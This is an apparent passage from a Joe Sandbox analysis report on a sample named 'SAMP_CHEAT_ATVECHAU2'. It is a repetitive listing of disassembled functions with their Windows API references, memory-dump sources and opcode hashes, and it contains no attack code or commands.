                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0a9b84df483e11a286353e7f07e70b03c5bebd2b0294d89993675082f6cccd1f
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 0a9b84df483e11a286353e7f07e70b03c5bebd2b0294d89993675082f6cccd1f
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    Function 00D0E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9231737cc552420b0864ea00d93ee1820acda4531956f2ff8829e3137b7d8517
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 9231737cc552420b0864ea00d93ee1820acda4531956f2ff8829e3137b7d8517
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    Function 00D0E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 44a74193c1b6142f1f767f7f318b0712a377f45dfd3d7a359e5f474db6ecd453
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 44a74193c1b6142f1f767f7f318b0712a377f45dfd3d7a359e5f474db6ecd453
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    Function 00D0E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6134fe4d0dbcf667e6ce7d9c9ef666be374d4782f19907eb856b6667b1c4d3e9
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 6134fe4d0dbcf667e6ce7d9c9ef666be374d4782f19907eb856b6667b1c4d3e9
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    Function 00D0E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6aadc7d140b2cf2ba45d28784829cc7d365d3e2390a0d5150ed0d19fb56623ac
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 6aadc7d140b2cf2ba45d28784829cc7d365d3e2390a0d5150ed0d19fb56623ac
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    Function 00D0E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 25e3b3c2d1ee51b80814517a2dce95cb51b5fab0cc783280bba55f660eba5f32
                                                    • Instruction ID: 3d26324bd879bb589eb6b73a5f1c5c351f513edf538c70c967a5d5c9d3f44a95
                                                    • Opcode Fuzzy Hash: 25e3b3c2d1ee51b80814517a2dce95cb51b5fab0cc783280bba55f660eba5f32
                                                    • Instruction Fuzzy Hash: 49A001D66AE562BCB11862A17D0AE3B031EC4D5B6A331AE2EF89A854D1A8805C5918B1
                                                    Function 00D0E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 760d5defeb26d332e354e51b46cadc5abd6532a61466affbef124b268db59a13
                                                    • Instruction ID: 3d26324bd879bb589eb6b73a5f1c5c351f513edf538c70c967a5d5c9d3f44a95
                                                    • Opcode Fuzzy Hash: 760d5defeb26d332e354e51b46cadc5abd6532a61466affbef124b268db59a13
                                                    • Instruction Fuzzy Hash: 49A001D66AE562BCB11862A17D0AE3B031EC4D5B6A331AE2EF89A854D1A8805C5918B1
                                                    Function 00D0E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 5b717c43b4d14de5b58b158ff3af00fa70eef390b7961ab4b193f001eb8fbdaf
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 5b717c43b4d14de5b58b158ff3af00fa70eef390b7961ab4b193f001eb8fbdaf
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    Function 00D0E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0ddf3a404a69780ee463a279f557c5e1ec17a06547f67d63b4f1f7786898f9cb
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 0ddf3a404a69780ee463a279f557c5e1ec17a06547f67d63b4f1f7786898f9cb
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    Function 00D0E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 25d453d0bb435aca4588fe18c56d5219f05d0385b6b407872265e1c09ff53a41
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 25d453d0bb435aca4588fe18c56d5219f05d0385b6b407872265e1c09ff53a41
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    Function 00D0E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 738ef2d2e414cdeab42991274572c70c900ce2ef90503fcd63905f3332b19fd3
                                                    • Instruction ID: 50f2666aed8be681b9a7c4db52f6cfbc147b5de020e9a3c92609a53a019087d5
                                                    • Opcode Fuzzy Hash: 738ef2d2e414cdeab42991274572c70c900ce2ef90503fcd63905f3332b19fd3
                                                    • Instruction Fuzzy Hash: C6A011C22AA0203CB00822A03C0AE3B030EC0E0B2A330AE2EF888800C0A8800C0808B0
                                                    Function 00D0E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 43dfa00522e52208c4d1e31f5f9684ec83d305905d53418d7ff8b9db8c77bb66
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 43dfa00522e52208c4d1e31f5f9684ec83d305905d53418d7ff8b9db8c77bb66
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    Function 00CF9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetEndOfFile.KERNELBASE(?,00CF903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CF9F0C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File
                                                    • String ID:
                                                    • API String ID: 749574446-0
                                                    • Opcode ID: c9a08f3dcb7854972c8c9fb59fae973129b796323317798060c2b04a4b9e1b92
                                                    • Instruction ID: 48e7f61ea0822abbdc88ed89506cedb96a7aa5f7fb1c83732ca79923657822b1
                                                    • Opcode Fuzzy Hash: c9a08f3dcb7854972c8c9fb59fae973129b796323317798060c2b04a4b9e1b92
                                                    • Instruction Fuzzy Hash: 6DA0113008020A8A8E202B30CA08A0C3B20FB20BC030002A8A00ACA0A2CB2A880B8A20
                                                    Function 00D0AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNELBASE(?,00D0AE72,C:\Users\user\Desktop,00000000,00D3946A,00000006), ref: 00D0AC08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: 1607835a084c0988f3e1100861c10a8036382bd5629b19b5fe3bb82b3b3effe3
                                                    • Instruction ID: c06bd5da4eea1e3fb3ef7e62bd2d684373401b9eff5687ed3557c23d826244b1
                                                    • Opcode Fuzzy Hash: 1607835a084c0988f3e1100861c10a8036382bd5629b19b5fe3bb82b3b3effe3
                                                    • Instruction Fuzzy Hash: D9A011302003008B82020B328F0AA0EBAAAAFA2B00F00C028A000C0230CB38C8B0AA20
                                                    Function 00CF9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00CF95D6,?,?,?,?,?,00D22641,000000FF), ref: 00CF963B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 927a8f6334af006e4b5b8a4d9ff696c806b0805c5cdf1b4b7cb3edce4129d2b6
                                                    • Instruction ID: 8c2366c963e9f76cf337a1ae6c777f6cc4b185676f2b6c996b19d12d1a496f89
                                                    • Opcode Fuzzy Hash: 927a8f6334af006e4b5b8a4d9ff696c806b0805c5cdf1b4b7cb3edce4129d2b6
                                                    • Instruction Fuzzy Hash: 8CF0E930081B099FDFB08A24C4487A277F8EB12321F140B1EE2F2829E0D370668D9A51

                                                    Non-executed Functions

                                                    Function 00D0C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D0C2B1
                                                    • EndDialog.USER32(?,00000006), ref: 00D0C2C4
                                                    • GetDlgItem.USER32(?,0000006C), ref: 00D0C2E0
                                                    • SetFocus.USER32(00000000), ref: 00D0C2E7
                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D0C321
